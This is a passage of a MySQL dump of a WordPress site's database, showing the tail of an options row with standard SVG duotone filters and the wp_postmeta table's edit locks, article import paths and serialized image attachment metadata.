color-interpolation-filters=\"sRGB\" ><feFuncR type=\"table\" tableValues=\"0 1\" /><feFuncG type=\"table\" tableValues=\"0 0.27843137254902\" /><feFuncB type=\"table\" tableValues=\"0.5921568627451 0.27843137254902\" /><feFuncA type=\"table\" tableValues=\"1 1\" /></feComponentTransfer><feComposite in2=\"SourceGraphic\" operator=\"in\" /></filter></defs></svg><svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 0 0\" width=\"0\" height=\"0\" focusable=\"false\" role=\"none\" style=\"visibility: hidden; position: absolute; left: -9999px; overflow: hidden;\" ><defs><filter id=\"wp-duotone-midnight\"><feColorMatrix color-interpolation-filters=\"sRGB\" type=\"matrix\" values=\" .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 \" /><feComponentTransfer color-interpolation-filters=\"sRGB\" ><feFuncR type=\"table\" tableValues=\"0 0\" /><feFuncG type=\"table\" tableValues=\"0 0.64705882352941\" /><feFuncB type=\"table\" tableValues=\"0 1\" /><feFuncA type=\"table\" tableValues=\"1 1\" /></feComponentTransfer><feComposite in2=\"SourceGraphic\" operator=\"in\" /></filter></defs></svg><svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 0 0\" width=\"0\" height=\"0\" focusable=\"false\" role=\"none\" style=\"visibility: hidden; position: absolute; left: -9999px; overflow: hidden;\" ><defs><filter id=\"wp-duotone-magenta-yellow\"><feColorMatrix color-interpolation-filters=\"sRGB\" type=\"matrix\" values=\" .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 \" /><feComponentTransfer color-interpolation-filters=\"sRGB\" ><feFuncR type=\"table\" tableValues=\"0.78039215686275 1\" /><feFuncG type=\"table\" tableValues=\"0 0.94901960784314\" /><feFuncB type=\"table\" tableValues=\"0.35294117647059 0.47058823529412\" /><feFuncA type=\"table\" tableValues=\"1 1\" /></feComponentTransfer><feComposite in2=\"SourceGraphic\" operator=\"in\" /></filter></defs></svg><svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 0 0\" width=\"0\" height=\"0\" focusable=\"false\" role=\"none\" style=\"visibility: hidden; position: absolute; left: -9999px; overflow: hidden;\" ><defs><filter id=\"wp-duotone-purple-green\"><feColorMatrix color-interpolation-filters=\"sRGB\" type=\"matrix\" values=\" .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 \" /><feComponentTransfer color-interpolation-filters=\"sRGB\" ><feFuncR type=\"table\" tableValues=\"0.65098039215686 0.40392156862745\" /><feFuncG type=\"table\" tableValues=\"0 1\" /><feFuncB type=\"table\" tableValues=\"0.44705882352941 0.4\" /><feFuncA type=\"table\" tableValues=\"1 1\" /></feComponentTransfer><feComposite in2=\"SourceGraphic\" operator=\"in\" /></filter></defs></svg><svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 0 0\" width=\"0\" height=\"0\" focusable=\"false\" role=\"none\" style=\"visibility: hidden; position: absolute; left: -9999px; overflow: hidden;\" ><defs><filter id=\"wp-duotone-blue-orange\"><feColorMatrix color-interpolation-filters=\"sRGB\" type=\"matrix\" values=\" .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 \" /><feComponentTransfer color-interpolation-filters=\"sRGB\" ><feFuncR type=\"table\" tableValues=\"0.098039215686275 1\" /><feFuncG type=\"table\" tableValues=\"0 0.66274509803922\" /><feFuncB type=\"table\" tableValues=\"0.84705882352941 0.41960784313725\" /><feFuncA type=\"table\" tableValues=\"1 1\" /></feComponentTransfer><feComposite in2=\"SourceGraphic\" operator=\"in\" /></filter></defs></svg>','no');
/*!40000 ALTER TABLE `wp_options` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_postmeta`
--

DROP TABLE IF EXISTS `wp_postmeta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_postmeta` (
  `meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `post_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `meta_key` varchar(255) DEFAULT NULL,
  `meta_value` longtext DEFAULT NULL,
  PRIMARY KEY (`meta_id`),
  KEY `post_id` (`post_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=InnoDB AUTO_INCREMENT=617 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_postmeta`
--

LOCK TABLES `wp_postmeta` WRITE;
/*!40000 ALTER TABLE `wp_postmeta` DISABLE KEYS */;
INSERT INTO `wp_postmeta` VALUES (11,6,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(12,6,'_edit_last','1'),(13,6,'_adinserter_block_exceptions',''),(14,6,'_wpb_vc_js_status','false'),(15,6,'_edit_lock','1503388401:1'),(16,8,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(17,8,'_edit_last','1'),(18,8,'_adinserter_block_exceptions',''),(19,8,'_wpb_vc_js_status','false'),(20,8,'_edit_lock','1503388463:1'),(21,10,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(22,10,'_edit_last','1'),(23,10,'_adinserter_block_exceptions',''),(24,10,'_wpb_vc_js_status','false'),(25,10,'_edit_lock','1503388442:1'),(26,12,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(27,12,'_edit_last','1'),(28,12,'_adinserter_block_exceptions',''),(29,12,'_wpb_vc_js_status','false'),(30,12,'_edit_lock','1503388422:1'),(31,14,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(32,14,'_edit_last','1'),(33,14,'_adinserter_block_exceptions',''),(34,14,'_wpb_vc_js_status','false'),(35,14,'_edit_lock','1503388485:1'),(41,24,'_edit_lock','1508231283:1'),(44,27,'URL_before_HTML_Import','/var/www/dailyjolly.co.uk/html/articles/bat-or-bird-box.html'),(45,28,'URL_before_HTML_Import','/var/www/dailyjolly.co.uk/html/articles/bee-clever-at-the-eden-project.html'),(46,29,'URL_before_HTML_Import','/var/www/dailyjolly.co.uk/html/articles/biological-cleaning-and-the-enzyme-myth.html'),(47,30,'URL_before_HTML_Import','/var/www/dailyjolly.co.uk/html/articles/blue-mile-training.html'),(48,31,'URL_before_HTML_Import','/var/www/dailyjolly.co.uk/html/articles/blue-mile.html'),(49,32,'URL_before_HTML_Import','/var/www/dailyjolly.co.uk/html/articles/catalytic-clothing.html'),(50,33,'URL_before_HTML_Import','/var/www/dailyjolly.co.uk/html/articles/cleaner-toilet-cleaner.html'),(51,34,'URL_before_HTML_Import','/var/www/dailyjolly.co.uk/html/articles/cleanercise.html'),(52,35,'URL_before_HTML_Import','/var/www/dailyjolly.co.uk/html/articles/cruelty-free-products.html'),(53,36,'URL_before_HTML_Import','/var/www/dailyjolly.co.uk/html/articles/factory-facts.html'),(54,37,'URL_before_HTML_Import','/var/www/dailyjolly.co.uk/html/articles/fantastic-plantastic.html'),(55,38,'URL_before_HTML_Import','/var/www/dailyjolly.co.uk/html/articles/festival-hints-and-tips.html'),(56,39,'URL_before_HTML_Import','/var/www/dailyjolly.co.uk/html/articles/foam-boosters.html'),(57,40,'URL_before_HTML_Import','/var/www/dailyjolly.co.uk/html/articles/good-housekeeping-2011.html'),(58,41,'URL_before_HTML_Import','/var/www/dailyjolly.co.uk/html/articles/green-christmas-shopping.html'),(59,42,'URL_before_HTML_Import','/var/www/dailyjolly.co.uk/html/articles/green-production-values.html'),(60,43,'URL_before_HTML_Import','/var/www/dailyjolly.co.uk/html/articles/grey-water.html'),(61,44,'URL_before_HTML_Import','/var/www/dailyjolly.co.uk/html/articles/hosepipe-ban.html'),(62,45,'URL_before_HTML_Import','/var/www/dailyjolly.co.uk/html/articles/london-fashion-week.html'),(63,46,'URL_before_HTML_Import','/var/www/dailyjolly.co.uk/html/articles/no-nasties.html'),(64,47,'URL_before_HTML_Import','/var/www/dailyjolly.co.uk/html/articles/nominate-your-winner.html'),(65,48,'URL_before_HTML_Import','/var/www/dailyjolly.co.uk/html/articles/optical-brighteners.html'),(66,49,'URL_before_HTML_Import','/var/www/dailyjolly.co.uk/html/articles/our-ingredients.html'),(67,50,'URL_before_HTML_Import','/var/www/dailyjolly.co.uk/html/articles/paul-rose-and-the-blue-mile.html'),(68,51,'URL_before_HTML_Import','/var/www/dailyjolly.co.uk/html/articles/rainbow-warrior3.html'),(69,52,'URL_before_HTML_Import','/var/www/dailyjolly.co.uk/html/articles/recycling-labels.html'),(70,53,'URL_before_HTML_Import','/var/www/dailyjolly.co.uk/html/articles/regal-cinema.html'),(71,54,'URL_before_HTML_Import','/var/www/dailyjolly.co.uk/html/articles/sensitive-skin.html'),(72,55,'URL_before_HTML_Import','/var/www/dailyjolly.co.uk/html/articles/stain-removal.html'),(73,56,'URL_before_HTML_Import','/var/www/dailyjolly.co.uk/html/articles/starting-an-exercise-routine.html'),(74,57,'URL_before_HTML_Import','/var/www/dailyjolly.co.uk/html/articles/travel-hints-and-tips.html'),(75,58,'URL_before_HTML_Import','/var/www/dailyjolly.co.uk/html/articles/wateraid-ethiopia.html'),(76,59,'URL_before_HTML_Import','/var/www/dailyjolly.co.uk/html/articles/wateraid-transforming-lives.html'),(77,60,'URL_before_HTML_Import','/var/www/dailyjolly.co.uk/html/articles/wear-and-care.html'),(78,27,'_edit_lock','1508229319:1'),(79,27,'_edit_last','1'),(82,27,'_adinserter_block_exceptions',''),(83,27,'_hitmag_layout_meta','th-default-layout'),(84,31,'_edit_lock','1508229174:1'),(85,31,'_edit_last','1'),(88,31,'_adinserter_block_exceptions',''),(89,31,'_hitmag_layout_meta','th-default-layout'),(90,31,'_wp_old_slug','ecover-blue-mile'),(91,30,'_edit_lock','1508229242:1'),(92,30,'_edit_last','1'),(95,30,'_adinserter_block_exceptions',''),(96,30,'_hitmag_layout_meta','th-default-layout'),(97,30,'_wp_old_slug','training-for-the-blue-mile-the-splash'),(98,29,'_edit_lock','1508229276:1'),(99,29,'_edit_last','1'),(102,29,'_adinserter_block_exceptions',''),(103,29,'_hitmag_layout_meta','th-default-layout'),(104,28,'_edit_lock','1508229314:1'),(105,28,'_edit_last','1'),(108,28,'_adinserter_block_exceptions',''),(109,28,'_hitmag_layout_meta','th-default-layout'),(110,32,'_edit_lock','1508229339:1'),(111,32,'_edit_last','1'),(114,32,'_adinserter_block_exceptions',''),(115,32,'_hitmag_layout_meta','th-default-layout'),(116,33,'_edit_lock','1508753390:1'),(117,33,'_edit_last','1'),(120,33,'_adinserter_block_exceptions',''),(121,33,'_hitmag_layout_meta','th-default-layout'),(122,34,'_edit_lock','1508229432:1'),(123,35,'_edit_lock','1508229481:1'),(124,34,'_edit_last','1'),(127,34,'_adinserter_block_exceptions',''),(128,34,'_hitmag_layout_meta','th-default-layout'),(129,35,'_edit_last','1'),(132,35,'_adinserter_block_exceptions',''),(133,35,'_hitmag_layout_meta','th-default-layout'),(134,35,'_wp_old_slug','cruelty-free-cleaning-products-the-splash-ecover'),(135,36,'_edit_lock','1508229521:1'),(136,36,'_edit_last','1'),(139,36,'_adinserter_block_exceptions',''),(140,36,'_hitmag_layout_meta','th-default-layout'),(141,37,'_edit_lock','1508229574:1'),(142,37,'_edit_last','1'),(145,37,'_adinserter_block_exceptions',''),(146,37,'_hitmag_layout_meta','th-default-layout'),(147,38,'_edit_lock','1521626344:1'),(148,38,'_edit_last','1'),(151,38,'_adinserter_block_exceptions',''),(152,38,'_hitmag_layout_meta','th-default-layout'),(153,38,'_wp_old_slug','festival-hints-and-tips-from-ecover'),(154,39,'_edit_lock','1508229655:1'),(155,39,'_edit_last','1'),(158,39,'_adinserter_block_exceptions',''),(159,39,'_hitmag_layout_meta','th-default-layout'),(160,39,'_wp_old_slug','why-we-dont-use-foam-boosters'),(161,43,'_edit_lock','1508229700:1'),(162,43,'_edit_last','1'),(165,43,'_adinserter_block_exceptions',''),(166,43,'_hitmag_layout_meta','th-default-layout'),(167,42,'_edit_lock','1508229780:1'),(168,42,'_edit_last','1'),(171,42,'_adinserter_block_exceptions',''),(172,42,'_hitmag_layout_meta','th-default-layout'),(173,41,'_edit_lock','1508229819:1'),(174,41,'_edit_last','1'),(177,41,'_adinserter_block_exceptions',''),(178,41,'_hitmag_layout_meta','th-default-layout'),(179,40,'_edit_lock','1508230056:1'),(180,40,'_edit_last','1'),(183,40,'_adinserter_block_exceptions',''),(184,40,'_hitmag_layout_meta','th-default-layout'),(187,40,'_wp_old_slug','good-housekeeping-institute-approved'),(188,46,'_edit_last','1'),(191,46,'_wp_old_slug','ecover-products-contain-no-nasties-ecover'),(192,46,'_edit_lock','1508229972:1'),(193,48,'_edit_lock','1508229935:1'),(194,48,'_edit_last','1'),(197,48,'_adinserter_block_exceptions',''),(198,48,'_hitmag_layout_meta','th-default-layout'),(199,47,'_edit_lock','1508229990:1'),(200,47,'_edit_last','1'),(203,47,'_adinserter_block_exceptions',''),(204,47,'_hitmag_layout_meta','th-default-layout'),(207,46,'_adinserter_block_exceptions',''),(208,46,'_hitmag_layout_meta','th-default-layout'),(209,45,'_edit_lock','1508229990:1'),(210,45,'_edit_last','1'),(213,45,'_adinserter_block_exceptions',''),(214,45,'_hitmag_layout_meta','th-default-layout'),(215,44,'_edit_lock','1508230056:1'),(216,44,'_edit_last','1'),(219,44,'_adinserter_block_exceptions',''),(220,44,'_hitmag_layout_meta','th-default-layout'),(223,49,'_edit_lock','1508230058:1'),(224,49,'_edit_last','1'),(227,49,'_adinserter_block_exceptions',''),(228,49,'_hitmag_layout_meta','th-default-layout'),(229,50,'_edit_lock','1508230162:1'),(230,50,'_edit_last','1'),(233,50,'_adinserter_block_exceptions',''),(234,50,'_hitmag_layout_meta','th-default-layout'),(235,50,'_wp_old_slug','paul-rose-and-the-ecover-blue-mile'),(236,51,'_edit_lock','1508230132:1'),(237,51,'_edit_last','1'),(240,51,'_adinserter_block_exceptions',''),(241,51,'_hitmag_layout_meta','th-default-layout'),(242,52,'_edit_lock','1508230149:1'),(243,52,'_edit_last','1'),(246,52,'_adinserter_block_exceptions',''),(247,52,'_hitmag_layout_meta','th-default-layout'),(248,53,'_edit_lock','1508230163:1'),(249,53,'_edit_last','1'),(252,53,'_adinserter_block_exceptions',''),(253,53,'_hitmag_layout_meta','th-default-layout'),(254,57,'_edit_last','1'),(257,57,'_wp_old_slug','travel-hints-and-tips-from-ecover'),(258,57,'_edit_lock','1508230561:1'),(259,56,'_edit_last','1'),(262,56,'_wp_old_slug','start-your-feel-good-exercise-routine-with-frankie'),(263,56,'_edit_lock','1508230327:1'),(264,58,'_edit_last','1'),(267,58,'_wp_old_slug','an-ecover-and-wateraid-project'),(268,58,'_edit_lock','1508230336:1'),(271,104,'_wp_attached_file','2017/10/12_apostles_coast.jpg'),(272,104,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:3500;s:6:\"height\";i:2329;s:4:\"file\";s:29:\"2017/10/12_apostles_coast.jpg\";s:5:\"sizes\";a:9:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"12_apostles_coast-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"12_apostles_coast-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:29:\"12_apostles_coast-768x511.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:30:\"12_apostles_coast-1024x681.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:681;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"hitmag-landscape\";a:4:{s:4:\"file\";s:30:\"12_apostles_coast-1120x450.jpg\";s:5:\"width\";i:1120;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"hitmag-featured\";a:4:{s:4:\"file\";s:29:\"12_apostles_coast-735x400.jpg\";s:5:\"width\";i:735;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"hitmag-grid\";a:4:{s:4:\"file\";s:29:\"12_apostles_coast-348x215.jpg\";s:5:\"width\";i:348;s:6:\"height\";i:215;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"hitmag-list\";a:4:{s:4:\"file\";s:29:\"12_apostles_coast-290x220.jpg\";s:5:\"width\";i:290;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"hitmag-thumbnail\";a:4:{s:4:\"file\";s:28:\"12_apostles_coast-135x93.jpg\";s:5:\"width\";i:135;s:6:\"height\";i:93;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"8\";s:6:\"credit\";s:21:\"photoeverywhere.co.uk\";s:6:\"camera\";s:10:\"NIKON D700\";s:7:\"caption\";s:118:\"People watching sunset at viewpoint by Twelve Apostles limestone rock formation, Great Ocean Road, Victoria, Australia\";s:17:\"created_timestamp\";s:10:\"1318490677\";s:9:\"copyright\";s:99:\"www.freeimages.co.uk see site for terms of use, provided with permission from photoeverywhere.co.uk\";s:12:\"focal_length\";s:2:\"20\";s:3:\"iso\";s:3:\"200\";s:13:\"shutter_speed\";s:5:\"0.004\";s:5:\"title\";s:36:\"Twelve Apostles at sunset, Australia\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:19:{i:0;s:5:\"beach\";i:1;s:5:\"coast\";i:2;s:10:\"formations\";i:3;s:10:\"geological\";i:4;s:9:\"limestone\";i:5;s:4:\"rock\";i:6;s:3:\"sea\";i:7;s:6:\"stacks\";i:8;s:9:\"viewpoint\";i:9;s:5:\"sunet\";i:10;s:6:\"sunset\";i:11;s:10:\"silhouette\";i:12;s:9:\"australia\";i:13;s:15:\"twelve apostles\";i:14;s:8:\"tourists\";i:15;s:11:\"12 apostles\";i:16;s:16:\"viewing platform\";i:17;s:8:\"tourists\";i:18;s:6:\"sunset\";}}}'),(273,105,'_wp_attached_file','2017/10/25waydconnector.jpg'),(274,105,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1010;s:6:\"height\";i:560;s:4:\"file\";s:27:\"2017/10/25waydconnector.jpg\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"25waydconnector-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"25waydconnector-300x166.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:166;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:27:\"25waydconnector-768x426.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:426;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"hitmag-landscape\";a:4:{s:4:\"file\";s:28:\"25waydconnector-1010x450.jpg\";s:5:\"width\";i:1010;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"hitmag-featured\";a:4:{s:4:\"file\";s:27:\"25waydconnector-735x400.jpg\";s:5:\"width\";i:735;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"hitmag-grid\";a:4:{s:4:\"file\";s:27:\"25waydconnector-348x215.jpg\";s:5:\"width\";i:348;s:6:\"height\";i:215;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"hitmag-list\";a:4:{s:4:\"file\";s:27:\"25waydconnector-290x220.jpg\";s:5:\"width\";i:290;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"hitmag-thumbnail\";a:4:{s:4:\"file\";s:26:\"25waydconnector-135x93.jpg\";s:5:\"width\";i:135;s:6:\"height\";i:93;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:130:\"a text credit and or hyperlink to our site is required if you use this image. Please visit http://www.freeimages.co.uk for details\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:35:\"freeimages.co.uk techonology images\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(275,106,'_wp_attached_file','2017/10/35mm_film-Copy-Copy.jpg'),(276,106,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:3500;s:6:\"height\";i:2329;s:4:\"file\";s:31:\"2017/10/35mm_film-Copy-Copy.jpg\";s:5:\"sizes\";a:9:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"35mm_film-Copy-Copy-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"35mm_film-Copy-Copy-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:31:\"35mm_film-Copy-Copy-768x511.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:32:\"35mm_film-Copy-Copy-1024x681.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:681;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"hitmag-landscape\";a:4:{s:4:\"file\";s:32:\"35mm_film-Copy-Copy-1120x450.jpg\";s:5:\"width\";i:1120;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"hitmag-featured\";a:4:{s:4:\"file\";s:31:\"35mm_film-Copy-Copy-735x400.jpg\";s:5:\"width\";i:735;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"hitmag-grid\";a:4:{s:4:\"file\";s:31:\"35mm_film-Copy-Copy-348x215.jpg\";s:5:\"width\";i:348;s:6:\"height\";i:215;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"hitmag-list\";a:4:{s:4:\"file\";s:31:\"35mm_film-Copy-Copy-290x220.jpg\";s:5:\"width\";i:290;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"hitmag-thumbnail\";a:4:{s:4:\"file\";s:30:\"35mm_film-Copy-Copy-135x93.jpg\";s:5:\"width\";i:135;s:6:\"height\";i:93;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:2:\"16\";s:6:\"credit\";s:20:\"www.freeimages.co.uk\";s:6:\"camera\";s:10:\"NIKON D700\";s:7:\"caption\";s:127:\"Close up detail of a roll of 35mm film viewed from a high angle showing the coils of the reel and sprockets , isolated on white\";s:17:\"created_timestamp\";s:10:\"1335449664\";s:9:\"copyright\";s:46:\"www.freeimages.co.uk see site for terms of use\";s:12:\"focal_length\";s:3:\"105\";s:3:\"iso\";s:3:\"200\";s:13:\"shutter_speed\";s:5:\"0.008\";s:5:\"title\";s:38:\"Close up detail of a roll of 35mm film\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:15:{i:0;s:8:\"abstract\";i:1;s:10:\"background\";i:2;s:4:\"film\";i:3;s:11:\"perforation\";i:4;s:11:\"photography\";i:5;s:5:\"35 mm\";i:6;s:8:\"obsolete\";i:7;s:13:\"old fashioned\";i:8;s:16:\"white background\";i:9;s:7:\"exposed\";i:10;s:8:\"close up\";i:11;s:8:\"artistic\";i:12;s:10:\"creativity\";i:13;s:9:\"equipment\";i:14;s:3:\"art\";}}}'),(277,107,'_wp_attached_file','2017/10/35mm_film-Copy.jpg'),(278,107,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:3500;s:6:\"height\";i:2329;s:4:\"file\";s:26:\"2017/10/35mm_film-Copy.jpg\";s:5:\"sizes\";a:9:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"35mm_film-Copy-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"35mm_film-Copy-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:26:\"35mm_film-Copy-768x511.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:27:\"35mm_film-Copy-1024x681.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:681;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"hitmag-landscape\";a:4:{s:4:\"file\";s:27:\"35mm_film-Copy-1120x450.jpg\";s:5:\"width\";i:1120;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"hitmag-featured\";a:4:{s:4:\"file\";s:26:\"35mm_film-Copy-735x400.jpg\";s:5:\"width\";i:735;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"hitmag-grid\";a:4:{s:4:\"file\";s:26:\"35mm_film-Copy-348x215.jpg\";s:5:\"width\";i:348;s:6:\"height\";i:215;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"hitmag-list\";a:4:{s:4:\"file\";s:26:\"35mm_film-Copy-290x220.jpg\";s:5:\"width\";i:290;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"hitmag-thumbnail\";a:4:{s:4:\"file\";s:25:\"35mm_film-Copy-135x93.jpg\";s:5:\"width\";i:135;s:6:\"height\";i:93;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:2:\"16\";s:6:\"credit\";s:20:\"www.freeimages.co.uk\";s:6:\"camera\";s:10:\"NIKON D700\";s:7:\"caption\";s:127:\"Close up detail of a roll of 35mm film viewed from a high angle showing the coils of the reel and sprockets , isolated on white\";s:17:\"created_timestamp\";s:10:\"1335449664\";s:9:\"copyright\";s:46:\"www.freeimages.co.uk see site for terms of use\";s:12:\"focal_length\";s:3:\"105\";s:3:\"iso\";s:3:\"200\";s:13:\"shutter_speed\";s:5:\"0.008\";s:5:\"title\";s:38:\"Close up detail of a roll of 35mm film\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:15:{i:0;s:8:\"abstract\";i:1;s:10:\"background\";i:2;s:4:\"film\";i:3;s:11:\"perforation\";i:4;s:11:\"photography\";i:5;s:5:\"35 mm\";i:6;s:8:\"obsolete\";i:7;s:13:\"old fashioned\";i:8;s:16:\"white background\";i:9;s:7:\"exposed\";i:10;s:8:\"close up\";i:11;s:8:\"artistic\";i:12;s:10:\"creativity\";i:13;s:9:\"equipment\";i:14;s:3:\"art\";}}}'),(279,108,'_wp_attached_file','2017/10/35mm_film.jpg'),(280,108,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:3500;s:6:\"height\";i:2329;s:4:\"file\";s:21:\"2017/10/35mm_film.jpg\";s:5:\"sizes\";a:9:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"35mm_film-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"35mm_film-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"35mm_film-768x511.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"35mm_film-1024x681.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:681;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"hitmag-landscape\";a:4:{s:4:\"file\";s:22:\"35mm_film-1120x450.jpg\";s:5:\"width\";i:1120;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"hitmag-featured\";a:4:{s:4:\"file\";s:21:\"35mm_film-735x400.jpg\";s:5:\"width\";i:735;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"hitmag-grid\";a:4:{s:4:\"file\";s:21:\"35mm_film-348x215.jpg\";s:5:\"width\";i:348;s:6:\"height\";i:215;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"hitmag-list\";a:4:{s:4:\"file\";s:21:\"35mm_film-290x220.jpg\";s:5:\"width\";i:290;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"hitmag-thumbnail\";a:4:{s:4:\"file\";s:20:\"35mm_film-135x93.jpg\";s:5:\"width\";i:135;s:6:\"height\";i:93;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:2:\"16\";s:6:\